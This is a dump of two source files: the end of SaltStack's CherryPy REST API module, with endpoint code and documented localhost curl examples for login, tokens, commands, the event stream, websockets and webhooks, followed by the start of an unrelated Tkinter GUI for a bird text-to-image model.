-c ~/cookies.txt \\
-H "Accept: application/json" \\
-H "Content-type: application/json" \\
-d '{
"username": "saltuser",
"password": "saltuser",
"eauth": "auto"
}'
.. code-block:: http
POST / HTTP/1.1
Host: localhost:8000
Content-Length: 42
Content-Type: application/json
Accept: application/json
{"username": "saltuser", "password": "saltuser", "eauth": "auto"}
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 206
X-Auth-Token: 6d1b722e
Set-Cookie: session_id=6d1b722e; expires=Sat, 17 Nov 2012 03:23:52 GMT; Path=/
{"return": {
"token": "6d1b722e",
"start": 1363805943.776223,
"expire": 1363849143.776224,
"user": "saltuser",
"eauth": "pam",
"perms": [
"grains.*",
"status.*",
"sys.*",
"test.*"
]
}}
'''
if not self.api._is_master_running():
raise salt.exceptions.SaltDaemonNotRunning(
'Salt Master is not available.')
# the urlencoded_processor will wrap this in a list
if isinstance(cherrypy.serving.request.lowstate, list):
creds = cherrypy.serving.request.lowstate[0]
else:
creds = cherrypy.serving.request.lowstate
username = creds.get('username', None)
# Validate against the whitelist.
if not salt_api_acl_tool(username, cherrypy.request):
raise cherrypy.HTTPError(401)
# Mint token.
token = self.auth.mk_token(creds)
if 'token' not in token:
raise cherrypy.HTTPError(401,
'Could not authenticate using provided credentials')
cherrypy.response.headers['X-Auth-Token'] = cherrypy.session.id
cherrypy.session['token'] = token['token']
cherrypy.session['timeout'] = (token['expire'] - token['start']) / 60
cherrypy.session['user'] = token['name']
if 'groups' in token:
cherrypy.session['groups'] = token['groups']
# Grab eauth config for the current backend for the current user
try:
eauth = self.opts.get('external_auth', {}).get(token['eauth'], {})
if token['eauth'] == 'django' and '^model' in eauth:
perms = token['auth_list']
else:
# Get sum of '*' perms, user-specific perms, and group-specific perms
perms = eauth.get(token['name'], [])
perms.extend(eauth.get('*', []))
if 'groups' in token and token['groups']:
user_groups = set(token['groups'])
eauth_groups = set([i.rstrip('%') for i in eauth.keys() if i.endswith('%')])
for group in user_groups & eauth_groups:
perms.extend(eauth['{0}%'.format(group)])
if not perms:
logger.debug("Eauth permission list not found.")
except Exception:
logger.debug("Configuration for external_auth malformed for "
"eauth '{0}', and user '{1}'."
.format(token.get('eauth'), token.get('name')), exc_info=True)
perms = None
return {'return': [{
'token': cherrypy.session.id,
'expire': token['expire'],
'start': token['start'],
'user': token['name'],
'eauth': token['eauth'],
'perms': perms or {},
}]}
class Logout(LowDataAdapter):
'''
Class to remove or invalidate sessions
'''
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_auth.on': True,
'tools.lowdata_fmt.on': False,
})
def POST(self):
'''
Destroy the currently active session and expire the session cookie
'''
cherrypy.lib.sessions.expire() # set client-side to expire
cherrypy.session.regenerate() # replace server-side with new
return {'return': "Your token has been cleared"}
class Token(LowDataAdapter):
'''
Generate a Salt token from eauth credentials
Wraps functionality in the :py:mod:`auth Runner <salt.runners.auth>`.
.. versionadded:: 2017.7.0
'''
@cherrypy.config(**{'tools.sessions.on': False})
def POST(self, **kwargs):
r'''
.. http:post:: /token
Generate a Salt eauth token
:status 200: |200|
:status 400: |400|
:status 401: |401|
**Example request:**
.. code-block:: bash
curl -sSk https://localhost:8000/token \
-H 'Content-type: application/json' \
-d '{
"username": "saltdev",
"password": "saltdev",
"eauth": "auto"
}'
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Type: application/json
[{
"start": 1494987445.528182,
"token": "e72ca1655d05...",
"expire": 1495030645.528183,
"name": "saltdev",
"eauth": "auto"
}]
'''
for creds in cherrypy.request.lowstate:
try:
creds.update({
'client': 'runner',
'fun': 'auth.mk_token',
'kwarg': {
'username': creds['username'],
'password': creds['password'],
'eauth': creds['eauth'],
},
})
except KeyError:
raise cherrypy.HTTPError(400,
'Require "username", "password", and "eauth" params')
return list(self.exec_lowstate())
class Run(LowDataAdapter):
'''
Run commands bypassing the :ref:`normal session handling
<rest_cherrypy-auth>`
salt-api does not enforce authorization, Salt's eauth system does that.
Local/Runner/WheelClient all accept ``username``/``password``/``eauth``
**or** ``token`` kwargs that are then checked by the eauth system. The
session mechanism in ``rest_cherrypy`` simply pairs a session with a Salt
eauth token and then passes the ``token`` kwarg in automatically.
If you already have a Salt eauth token, perhaps generated by the
:py:func:`mk_token <salt.runners.auth.mk_token>` function in the Auth
Runner module, then there is no reason to use sessions.
This endpoint accepts either a ``username``, ``password``, ``eauth`` trio,
**or** a ``token`` kwarg and does not make use of sessions at all.
'''
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.sessions.on': False,
})
def POST(self, **kwargs):
'''
Run commands bypassing the :ref:`normal session handling
<rest_cherrypy-auth>` Other than that this URL is identical to the
:py:meth:`root URL (/) <LowDataAdapter.POST>`.
.. http:post:: /run
An array of :term:`lowstate` data describing Salt commands must be
sent in the request body.
:status 200: |200|
:status 400: |400|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -sS localhost:8000/run \\
-H 'Accept: application/x-yaml' \\
-H 'Content-type: application/json' \\
-d '[{
"client": "local",
"tgt": "*",
"fun": "test.ping",
"username": "saltdev",
"password": "saltdev",
"eauth": "auto"
}]'
**Or** using a Salt Eauth token:
.. code-block:: bash
curl -sS localhost:8000/run \\
-H 'Accept: application/x-yaml' \\
-H 'Content-type: application/json' \\
-d '[{
"client": "local",
"tgt": "*",
"fun": "test.ping",
"token": "<salt eauth token here>"
}]'
.. code-block:: http
POST /run HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Length: 75
Content-Type: application/json
[{"client": "local", "tgt": "*", "fun": "test.ping", "username": "saltdev", "password": "saltdev", "eauth": "auto"}]
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
return:
- ms-0: true
ms-1: true
ms-2: true
ms-3: true
ms-4: true
The /run enpoint can also be used to issue commands using the salt-ssh
subsystem.
When using salt-ssh, eauth credentials should not be supplied. Instad,
authentication should be handled by the SSH layer itself. The use of
the salt-ssh client does not require a salt master to be running.
Instead, only a roster file must be present in the salt configuration
directory.
All SSH client requests are synchronous.
**Example SSH client request:**
.. code-block:: bash
curl -sS localhost:8000/run \\
-H 'Accept: application/x-yaml' \\
-d client='ssh' \\
-d tgt='*' \\
-d fun='test.ping'
.. code-block:: http
POST /run HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Length: 75
Content-Type: application/x-www-form-urlencoded
client=ssh&tgt=*&fun=test.ping
**Example SSH response:**
.. code-block:: http
return:
- silver:
fun: test.ping
fun_args: []
id: silver
jid: '20141203103525666185'
retcode: 0
return: true
success: true
'''
return {
'return': list(self.exec_lowstate()),
}
class Events(object):
'''
Expose the Salt event bus
The event bus on the Salt master exposes a large variety of things, notably
when executions are started on the master and also when minions ultimately
return their results. This URL provides a real-time window into a running
Salt infrastructure.
.. seealso:: :ref:`events`
'''
exposed = True
_cp_config = dict(LowDataAdapter._cp_config, **{
'response.stream': True,
'tools.encode.encoding': 'utf-8',
# Auth handled manually below
'tools.salt_auth.on': False,
'tools.hypermedia_in.on': False,
'tools.hypermedia_out.on': False,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.resolver = salt.auth.Resolver(self.opts)
def _is_valid_token(self, auth_token):
'''
Check if this is a valid salt-api token or valid Salt token
salt-api tokens are regular session tokens that tie back to a real Salt
token. Salt tokens are tokens generated by Salt's eauth system.
:return bool: True if valid, False if not valid.
'''
if auth_token is None:
return False
# First check if the given token is in our session table; if so it's a
# salt-api token and we need to get the Salt token from there.
orig_session, _ = cherrypy.session.cache.get(auth_token, ({}, None))
# If it's not in the session table, assume it's a regular Salt token.
salt_token = orig_session.get('token', auth_token)
# The eauth system does not currently support perms for the event
# stream, so we're just checking if the token exists not if the token
# allows access.
if salt_token and self.resolver.get_token(salt_token):
return True
return False
def GET(self, token=None, salt_token=None):
r'''
An HTTP stream of the Salt master event bus
This stream is formatted per the Server Sent Events (SSE) spec. Each
event is formatted as JSON.
.. http:get:: /events
:status 200: |200|
:status 401: |401|
:status 406: |406|
:query token: **optional** parameter containing the token
ordinarily supplied via the X-Auth-Token header in order to
allow cross-domain requests in browsers that do not include
CORS support in the EventSource API. E.g.,
``curl -NsS localhost:8000/events?token=308650d``
:query salt_token: **optional** parameter containing a raw Salt
*eauth token* (not to be confused with the token returned from
the /login URL). E.g.,
``curl -NsS localhost:8000/events?salt_token=30742765``
**Example request:**
.. code-block:: bash
curl -NsS localhost:8000/events
.. code-block:: http
GET /events HTTP/1.1
Host: localhost:8000
**Example response:**
Note, the ``tag`` field is not part of the spec. SSE compliant clients
should ignore unknown fields. This addition allows non-compliant
clients to only watch for certain tags without having to deserialze the
JSON object each time.
.. code-block:: http
HTTP/1.1 200 OK
Connection: keep-alive
Cache-Control: no-cache
Content-Type: text/event-stream;charset=utf-8
retry: 400
tag: salt/job/20130802115730568475/new
data: {'tag': 'salt/job/20130802115730568475/new', 'data': {'minions': ['ms-4', 'ms-3', 'ms-2', 'ms-1', 'ms-0']}}
tag: salt/job/20130802115730568475/ret/jerry
data: {'tag': 'salt/job/20130802115730568475/ret/jerry', 'data': {'jid': '20130802115730568475', 'return': True, 'retcode': 0, 'success': True, 'cmd': '_return', 'fun': 'test.ping', 'id': 'ms-1'}}
The event stream can be easily consumed via JavaScript:
.. code-block:: javascript
var source = new EventSource('/events');
source.onopen = function() { console.info('Listening ...') };
source.onerror = function(err) { console.error(err) };
source.onmessage = function(message) {
var saltEvent = JSON.parse(message.data);
console.log(saltEvent.tag, saltEvent.data);
};
Note, the SSE stream is fast and completely asynchronous and Salt is
very fast. If a job is created using a regular POST request, it is
possible that the job return will be available on the SSE stream before
the response for the POST request arrives. It is important to take that
asynchronicity into account when designing an application. Below are
some general guidelines.
* Subscribe to the SSE stream _before_ creating any events.
* Process SSE events directly as they arrive and don't wait for any
other process to "complete" first (like an ajax request).
* Keep a buffer of events if the event stream must be used for
synchronous lookups.
* Be cautious in writing Salt's event stream directly to the DOM. It is
very busy and can quickly overwhelm the memory allocated to a
browser tab.
A full, working proof-of-concept JavaScript appliction is available
:blob:`adjacent to this file <salt/netapi/rest_cherrypy/index.html>`.
It can be viewed by pointing a browser at the ``/app`` endpoint in a
running ``rest_cherrypy`` instance.
Or using CORS:
.. code-block:: javascript
var source = new EventSource('/events?token=ecd589e4e01912cf3c4035afad73426dbb8dba75', {withCredentials: true});
It is also possible to consume the stream via the shell.
Records are separated by blank lines; the ``data:`` and ``tag:``
prefixes will need to be removed manually before attempting to
unserialize the JSON.
curl's ``-N`` flag turns off input buffering which is required to
process the stream incrementally.
Here is a basic example of printing each event as it comes in:
.. code-block:: bash
curl -NsS localhost:8000/events |\
while IFS= read -r line ; do
echo $line
done
Here is an example of using awk to filter events based on tag:
.. code-block:: bash
curl -NsS localhost:8000/events |\
awk '
BEGIN { RS=""; FS="\\n" }
$1 ~ /^tag: salt\/job\/[0-9]+\/new$/ { print $0 }
'
tag: salt/job/20140112010149808995/new
data: {"tag": "salt/job/20140112010149808995/new", "data": {"tgt_type": "glob", "jid": "20140112010149808995", "tgt": "jerry", "_stamp": "2014-01-12_01:01:49.809617", "user": "shouse", "arg": [], "fun": "test.ping", "minions": ["jerry"]}}
tag: 20140112010149808995
data: {"tag": "20140112010149808995", "data": {"fun_args": [], "jid": "20140112010149808995", "return": true, "retcode": 0, "success": true, "cmd": "_return", "_stamp": "2014-01-12_01:01:49.819316", "fun": "test.ping", "id": "jerry"}}
'''
cookies = cherrypy.request.cookie
auth_token = token or salt_token or (
cookies['session_id'].value if 'session_id' in cookies else None)
if not self._is_valid_token(auth_token):
raise cherrypy.HTTPError(401)
# Release the session lock before starting the long-running response
cherrypy.session.release_lock()
cherrypy.response.headers['Content-Type'] = 'text/event-stream'
cherrypy.response.headers['Cache-Control'] = 'no-cache'
cherrypy.response.headers['Connection'] = 'keep-alive'
def listen():
'''
An iterator to yield Salt events
'''
event = salt.utils.event.get_event(
'master',
sock_dir=self.opts['sock_dir'],
transport=self.opts['transport'],
opts=self.opts,
listen=True)
stream = event.iter_events(full=True, auto_reconnect=True)
yield u'retry: {0}\n'.format(400)
while True:
data = next(stream)
yield u'tag: {0}\n'.format(data.get('tag', ''))
yield u'data: {0}\n\n'.format(json.dumps(data))
return listen()
class WebsocketEndpoint(object):
'''
Open a WebSocket connection to Salt's event bus
The event bus on the Salt master exposes a large variety of things, notably
when executions are started on the master and also when minions ultimately
return their results. This URL provides a real-time window into a running
Salt infrastructure. Uses websocket as the transport mechanism.
.. seealso:: :ref:`events`
'''
exposed = True
_cp_config = dict(LowDataAdapter._cp_config, **{
'response.stream': True,
'tools.encode.encoding': 'utf-8',
# Auth handled manually below
'tools.salt_auth.on': False,
'tools.hypermedia_in.on': False,
'tools.hypermedia_out.on': False,
'tools.websocket.on': True,
'tools.websocket.handler_cls': websockets.SynchronizingWebsocket,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.auth = salt.auth.LoadAuth(self.opts)
def GET(self, token=None, **kwargs):
'''
Return a websocket connection of Salt's event stream
.. http:get:: /ws/(token)
:query format_events: The event stream will undergo server-side
formatting if the ``format_events`` URL parameter is included
in the request. This can be useful to avoid formatting on the
client-side:
.. code-block:: bash
curl -NsS <...snip...> localhost:8000/ws?format_events
:reqheader X-Auth-Token: an authentication token from
:py:class:`~Login`.
:status 101: switching to the websockets protocol
:status 401: |401|
:status 406: |406|
**Example request:** ::
curl -NsSk \\
-H 'X-Auth-Token: ffedf49d' \\
-H 'Host: localhost:8000' \\
-H 'Connection: Upgrade' \\
-H 'Upgrade: websocket' \\
-H 'Origin: https://localhost:8000' \\
-H 'Sec-WebSocket-Version: 13' \\
-H 'Sec-WebSocket-Key: '"$(echo -n $RANDOM | base64)" \\
localhost:8000/ws
.. code-block:: http
GET /ws HTTP/1.1
Connection: Upgrade
Upgrade: websocket
Host: localhost:8000
Origin: https://localhost:8000
Sec-WebSocket-Version: 13
Sec-WebSocket-Key: s65VsgHigh7v/Jcf4nXHnA==
X-Auth-Token: ffedf49d
**Example response**:
.. code-block:: http
HTTP/1.1 101 Switching Protocols
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Accept: mWZjBV9FCglzn1rIKJAxrTFlnJE=
Sec-WebSocket-Version: 13
An authentication token **may optionally** be passed as part of the URL
for browsers that cannot be configured to send the authentication
header or cookie:
.. code-block:: bash
curl -NsS <...snip...> localhost:8000/ws/ffedf49d
The event stream can be easily consumed via JavaScript:
.. code-block:: javascript
// Note, you must be authenticated!
var source = new Websocket('ws://localhost:8000/ws/d0ce6c1a');
source.onerror = function(e) { console.debug('error!', e); };
source.onmessage = function(e) { console.debug(e.data); };
source.send('websocket client ready')
source.close();
Or via Python, using the Python module `websocket-client
<https://pypi.python.org/pypi/websocket-client/>`_ for example.
.. code-block:: python
# Note, you must be authenticated!
from websocket import create_connection
ws = create_connection('ws://localhost:8000/ws/d0ce6c1a')
ws.send('websocket client ready')
# Look at https://pypi.python.org/pypi/websocket-client/ for more
# examples.
while listening_to_events:
print ws.recv()
ws.close()
Above examples show how to establish a websocket connection to Salt and
activating real time updates from Salt's event stream by signaling
``websocket client ready``.
'''
# Pulling the session token from an URL param is a workaround for
# browsers not supporting CORS in the EventSource API.
if token:
orig_session, _ = cherrypy.session.cache.get(token, ({}, None))
salt_token = orig_session.get('token')
else:
salt_token = cherrypy.session.get('token')
# Manually verify the token
if not salt_token or not self.auth.get_tok(salt_token):
raise cherrypy.HTTPError(401)
# Release the session lock before starting the long-running response
cherrypy.session.release_lock()
# A handler is the server side end of the websocket connection. Each
# request spawns a new instance of this handler
handler = cherrypy.request.ws_handler
def event_stream(handler, pipe):
'''
An iterator to return Salt events (and optionally format them)
'''
# blocks until send is called on the parent end of this pipe.
pipe.recv()
event = salt.utils.event.get_event(
'master',
sock_dir=self.opts['sock_dir'],
transport=self.opts['transport'],
opts=self.opts,
listen=True)
stream = event.iter_events(full=True, auto_reconnect=True)
SaltInfo = event_processor.SaltInfo(handler)
def signal_handler(signal, frame):
os._exit(0)
signal.signal(signal.SIGTERM, signal_handler)
while True:
data = next(stream)
if data:
try: # work around try to decode catch unicode errors
if 'format_events' in kwargs:
SaltInfo.process(data, salt_token, self.opts)
else:
handler.send('data: {0}\n\n'.format(
json.dumps(data)), False)
except UnicodeDecodeError:
logger.error(
"Error: Salt event has non UTF-8 data:\n{0}"
.format(data))
parent_pipe, child_pipe = Pipe()
handler.pipe = parent_pipe
handler.opts = self.opts
# Process to handle async push to a client.
# Each GET request causes a process to be kicked off.
proc = Process(target=event_stream, args=(handler, child_pipe))
proc.start()
class Webhook(object):
'''
A generic web hook entry point that fires an event on Salt's event bus
External services can POST data to this URL to trigger an event in Salt.
For example, Amazon SNS, Jenkins-CI or Travis-CI, or GitHub web hooks.
.. note:: Be mindful of security
Salt's Reactor can run any code. A Reactor SLS that responds to a hook
event is responsible for validating that the event came from a trusted
source and contains valid data.
**This is a generic interface and securing it is up to you!**
This URL requires authentication however not all external services can
be configured to authenticate. For this reason authentication can be
selectively disabled for this URL. Follow best practices -- always use
SSL, pass a secret key, configure the firewall to only allow traffic
from a known source, etc.
The event data is taken from the request body. The
:mailheader:`Content-Type` header is respected for the payload.
The event tag is prefixed with ``salt/netapi/hook`` and the URL path is
appended to the end. For example, a ``POST`` request sent to
``/hook/mycompany/myapp/mydata`` will produce a Salt event with the tag
``salt/netapi/hook/mycompany/myapp/mydata``.
The following is an example ``.travis.yml`` file to send notifications to
Salt of successful test runs:
.. code-block:: yaml
language: python
script: python -m unittest tests
after_success:
- |
curl -sSk https://saltapi-url.example.com:8000/hook/travis/build/success \
-d branch="${TRAVIS_BRANCH}" \
-d commit="${TRAVIS_COMMIT}"
.. seealso:: :ref:`events`, :ref:`reactor`
'''
exposed = True
tag_base = ['salt', 'netapi', 'hook']
_cp_config = dict(LowDataAdapter._cp_config, **{
# Don't do any lowdata processing on the POST data
'tools.lowdata_fmt.on': True,
# Auth can be overridden in __init__().
'tools.salt_auth.on': True,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.event = salt.utils.event.get_event(
'master',
sock_dir=self.opts['sock_dir'],
transport=self.opts['transport'],
opts=self.opts,
listen=False)
if cherrypy.config['apiopts'].get('webhook_disable_auth'):
self._cp_config['tools.salt_auth.on'] = False
def POST(self, *args, **kwargs):
'''
Fire an event in Salt with a custom event tag and data
.. http:post:: /hook
:status 200: |200|
:status 401: |401|
:status 406: |406|
:status 413: request body is too large
**Example request:**
.. code-block:: bash
curl -sS localhost:8000/hook \\
-H 'Content-type: application/json' \\
-d '{"foo": "Foo!", "bar": "Bar!"}'
.. code-block:: http
POST /hook HTTP/1.1
Host: localhost:8000
Content-Length: 16
Content-Type: application/json
{"foo": "Foo!", "bar": "Bar!"}
**Example response**:
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 14
Content-Type: application/json
{"success": true}
As a practical example, an internal continuous-integration build
server could send an HTTP POST request to the URL
``https://localhost:8000/hook/mycompany/build/success`` which contains
the result of a build and the SHA of the version that was built as
JSON. That would then produce the following event in Salt that could be
used to kick off a deployment via Salt's Reactor::
Event fired at Fri Feb 14 17:40:11 2014
*************************
Tag: salt/netapi/hook/mycompany/build/success
Data:
{'_stamp': '2014-02-14_17:40:11.440996',
'headers': {
'X-My-Secret-Key': 'F0fAgoQjIT@W',
'Content-Length': '37',
'Content-Type': 'application/json',
'Host': 'localhost:8000',
'Remote-Addr': '127.0.0.1'},
'post': {'revision': 'aa22a3c4b2e7', 'result': True}}
Salt's Reactor could listen for the event:
.. code-block:: yaml
reactor:
- 'salt/netapi/hook/mycompany/build/*':
- /srv/reactor/react_ci_builds.sls
And finally deploy the new build:
.. code-block:: jinja
{% set secret_key = data.get('headers', {}).get('X-My-Secret-Key') %}
{% set build = data.get('post', {}) %}
{% if secret_key == 'F0fAgoQjIT@W' and build.result == True %}
deploy_my_app:
cmd.state.sls:
- tgt: 'application*'
- arg:
- myapp.deploy
- kwarg:
pillar:
revision: {{ revision }}
{% endif %}
'''
tag = '/'.join(itertools.chain(self.tag_base, args))
data = cherrypy.serving.request.unserialized_data
if not data:
data = {}
raw_body = getattr(cherrypy.serving.request, 'raw_body', '')
headers = dict(cherrypy.request.headers)
ret = self.event.fire_event({
'body': raw_body,
'post': data,
'headers': headers,
}, tag)
return {'success': ret}
class Stats(object):
'''
Expose statistics on the running CherryPy server
'''
exposed = True
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_auth.on': True,
})
def __init__(self):
if cherrypy.config['apiopts'].get('stats_disable_auth'):
self._cp_config['tools.salt_auth.on'] = False
def GET(self):
'''
Return a dump of statistics collected from the CherryPy server
.. http:get:: /stats
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 401: |401|
:status 406: |406|
'''
if hasattr(logging, 'statistics'):
return cpstats.extrapolate_statistics(logging.statistics)
return {}
class App(object):
'''
Class to serve HTML5 apps
'''
exposed = True
def GET(self, *args):
'''
Serve a single static file ignoring the remaining path
This is useful in combination with a browser-based app using the HTML5
history API.
.. http::get:: /app
:reqheader X-Auth-Token: |req_token|
:status 200: |200|
:status 401: |401|
'''
apiopts = cherrypy.config['apiopts']
default_index = os.path.abspath(os.path.join(
os.path.dirname(__file__), 'index.html'))
return cherrypy.lib.static.serve_file(
apiopts.get('app', default_index))
class API(object):
'''
Collect configuration and URL map for building the CherryPy app
'''
url_map = {
'index': LowDataAdapter,
'login': Login,
'logout': Logout,
'token': Token,
'minions': Minions,
'run': Run,
'jobs': Jobs,
'keys': Keys,
'events': Events,
'stats': Stats,
}
def _setattr_url_map(self):
'''
Set an attribute on the local instance for each key/val in url_map
CherryPy uses class attributes to resolve URLs.
'''
if self.apiopts.get('enable_sessions', True) is False:
url_blacklist = ['login', 'logout', 'minions', 'jobs']
else:
url_blacklist = []
urls = ((url, cls) for url, cls in six.iteritems(self.url_map)
if url not in url_blacklist)
for url, cls in urls:
setattr(self, url, cls())
def _update_url_map(self):
'''
Assemble any dynamic or configurable URLs
'''
if HAS_WEBSOCKETS:
self.url_map.update({
'ws': WebsocketEndpoint,
})
# Allow the Webhook URL to be overridden from the conf.
self.url_map.update({
self.apiopts.get('webhook_url', 'hook').lstrip('/'): Webhook,
})
# Enable the single-page JS app URL.
self.url_map.update({
self.apiopts.get('app_path', 'app').lstrip('/'): App,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.apiopts = cherrypy.config['apiopts']
self._update_url_map()
self._setattr_url_map()
def get_conf(self):
'''
Combine the CherryPy configuration with the rest_cherrypy config values
pulled from the master config and return the CherryPy configuration
'''
conf = {
'global': {
'server.socket_host': self.apiopts.get('host', '0.0.0.0'),
'server.socket_port': self.apiopts.get('port', 8000),
'server.thread_pool': self.apiopts.get('thread_pool', 100),
'server.socket_queue_size': self.apiopts.get('queue_size', 30),
'max_request_body_size': self.apiopts.get(
'max_request_body_size', 1048576),
'debug': self.apiopts.get('debug', False),
'log.access_file': self.apiopts.get('log_access_file', ''),
'log.error_file': self.apiopts.get('log_error_file', ''),
},
'/': {
'request.dispatch': cherrypy.dispatch.MethodDispatcher(),
'tools.trailing_slash.on': True,
'tools.gzip.on': True,
'tools.html_override.on': True,
'tools.cors_tool.on': True,
},
}
if salt.utils.versions.version_cmp(cherrypy.__version__, '12.0.0') < 0:
# CherryPy >= 12.0 no longer supports "timeout_monitor", only set
# this config option when using an older version of CherryPy.
# See Issue #44601 for more information.
conf['global']['engine.timeout_monitor.on'] = self.apiopts.get(
'expire_responses', True
)
if cpstats and self.apiopts.get('collect_stats', False):
conf['/']['tools.cpstats.on'] = True
if 'favicon' in self.apiopts:
conf['/favicon.ico'] = {
'tools.staticfile.on': True,
'tools.staticfile.filename': self.apiopts['favicon'],
}
if self.apiopts.get('debug', False) is False:
conf['global']['environment'] = 'production'
# Serve static media if the directory has been set in the configuration
if 'static' in self.apiopts:
conf[self.apiopts.get('static_path', '/static')] = {
'tools.staticdir.on': True,
'tools.staticdir.dir': self.apiopts['static'],
}
# Add to global config
cherrypy.config.update(conf['global'])
return conf
def get_app(opts):
'''
Returns a WSGI app and a configuration dictionary
'''
apiopts = opts.get(__name__.rsplit('.', 2)[-2], {}) # rest_cherrypy opts
# Add Salt and salt-api config options to the main CherryPy config dict
cherrypy.config['saltopts'] = opts
cherrypy.config['apiopts'] = apiopts
root = API() # cherrypy app
cpyopts = root.get_conf() # cherrypy app opts
return root, apiopts, cpyopts
|
gui.py
|
from Tkinter import *
import ttk
import tkMessageBox
import sys
import main
import os
import speech_recognition as sr
from PIL import ImageTk, Image
import recording
import time
import threading
class Application(Frame):
def create_widgets(self):
self.image = Image.open('pictures/Backgrounds_bird.jpg')
self.img_copy = self.image.copy()
self.backgroundImage = ImageTk.PhotoImage(self.image)
self.imageBG = Label(self, image = self.backgroundImage)
self.imageBG.pack(fill=BOTH, expand=YES)
self.imageBG.bind('<Configure>', self._resize_image)
titleText = "Let's get your bird!"
self.Title = Label(self.imageBG, text = titleText, bg = '#D3D3D3')
self.Title.place(relx = 0.5, rely = 0.1, anchor = N)
self.Title.config(font = ('Helvetica', 22))
self.imgSpeak = Image.open('pictures/speak.png')
self.buttonImg1 = ImageTk.PhotoImage(self.imgSpeak)
self.speakBird = Button(self.imageBG, image = self.buttonImg1, command = self.speak_bird)
self.speakBird.place(relx = 0.4, rely = 0.45, anchor = CENTER)
self.imgType = Image.open('pictures/computer.png')
self.buttonImg2 = ImageTk.PhotoImage(self.imgType)
self.typeBird = Button(self.imageBG, image = self.buttonImg2, command = self.type_bird)
self.typeBird.place(relx = 0.6, rely = 0.45, anchor = CENTER)
self.imgExit = Image.open('pictures/exit.png')
self.imgExit = self.imgExit.resize((32, 32))
self.buttonImg3 = ImageTk.PhotoImage(self.imgExit)
self.QUIT = Button(self.imageBG, image = self.buttonImg3, command = self.quit)
self.QUIT.place(relx = 1, rely = 1, anchor = SE)
def speak_bird(self):
magic = Toplevel()
x_c = (self.screen_width/2) - 150
y_c = (self.screen_height/2) - 100
magic.geometry("300x200+%d+%d" % (x_c, y_c))
magic.title('Speak out your bird!')
timeCountText = 'Time: --:--'
self.timeCount = Label(magic, text = timeCountText)
self.timeCount.place(relx = 0.5, rely = 0.2, anchor = N)
startImg = Image.open('pictures/play.png')
startImg = startImg.resize((32, 32))
startButtonImg = ImageTk.PhotoImage(startImg)
start = Button(magic, image = startButtonImg, command = self._startRecording)
start.image = startButtonImg
start.place(relx = 0.35, rely = 0.5, anchor = CENTER)
stopImg = Image.open('pictures/stop.png')
stopImg = stopImg.resize((32, 32))
stopButtonImg = ImageTk.PhotoImage(stopImg)
stop = Button(magic, image = stopButtonImg, command = self._stopRecording)
stop.image = stopButtonImg
stop.place(relx = 0.5, rely = 0.5, anchor = CENTER)
showImg = Image.open('pictures/monitor.png')
showImg = showImg.resize((32, 32))
showButtonImg = ImageTk.PhotoImage(showImg)
show = Button(magic, image = showButtonImg, command = self._showResult)
show.image = showButtonImg
show.place(relx = 0.65, rely = 0.5, anchor = CENTER)
exitImg = Image.open('pictures/logout.png')
exitButtonImg = ImageTk.PhotoImage(exitImg)
exit = Button(magic, image = exitButtonImg, command = magic.destroy)
exit.image = exitButtonImg
exit.place(relx = 1, rely = 1, anchor = SE)
return
def type_bird(self, text = ''):
magic = Toplevel()
x_c = (self.screen_width/2) - 150
y_c = (self.screen_height/2) - 100
magic.geometry("300x200+%d+%d" % (x_c, y_c))
magic.title('Type your bird!')
title = Label(magic, text = 'Type in your bird')
title.place(relx = 0.5, rely = 0.1, anchor = N)
self.textEntry = Entry(magic, width = 25)
self.textEntry.place(relx = 0.5, rely = 0.4, anchor = CENTER)
self.textEntry.insert(INSERT, text)
okImg = Image.open('pictures/ok.png')
okButtonImg = ImageTk.PhotoImage(okImg)
okButton = Button(magic, image = okButtonImg, command = self._saveTextToFile)
okButton.image = okButtonImg
okButton.place(relx = 0.5, rely = 0.7, anchor = S)
exitImg = Image.open('pictures/logout.png')
exitButtonImg = ImageTk.PhotoImage(exitImg)
exit = Button(magic, image = exitButtonImg, command = magic.destroy)
exit.image = exitButtonImg
exit.place(relx = 1, rely = 1, anchor = SE)
return
def _saveTextToFile(self):
bird = self.textEntry.get()
self._runTextToImage(bird)
return
def _runTextToImage(self, bird):
file = open('../data/birds/example_captions.txt', 'w')
file.write(bird)
file.close()
os.system('python main.py --cfg cfg/eval_bird.yml')
pic = Toplevel()
'''
rows = 0
while rows < 50:
pic.rowconfigure(rows, weight = 1)
pic.columnconfigure(rows, weight = 1)
rows += 1
'''
nb = ttk.Notebook(pic)
#nb.grid(row = 1, column = 0, columnspan = 50, rowspan = 49, sticky = 'NESW')
old = self._createPictures_old(nb)
new = self._createPictures_new(nb)
nb.add(old, text = 'Original Model')
nb.add(new, text = 'Our Model')
nb.pack(expand = True, fill = BOTH)
return
def _createPictures_old(self, notebook):
old = ttk.Frame(notebook)
#old.title('Image in 256 pixels')
titleText = "Original Model"
self.Title = Label(old, text = titleText)
self.Title.grid(row = 0, column = 0, columnspan = 2)
self.Title.config(font = ('Helvetica', 44))
bird_imga0 = Image.open('../models/old/example_captions/0_s_0_a0.png')
bird_imga0 = bird_imga0.resize((580, 150))
bird_imga0 = ImageTk.PhotoImage(bird_imga0)
bird_imga1 = Image.open('../models/old/example_captions/0_s_0_a1.png')
bird_imga1 = bird_imga1.resize((580, 150))
bird_imga1 = ImageTk.PhotoImage(bird_imga1)
bird_imgg0 = ImageTk.PhotoImage(Image.open('../models/old/example_captions/0_s_0_g0.png'))
bird_imgg1 = ImageTk.PhotoImage(Image.open('../models/old/example_captions/0_s_0_g1.png'))
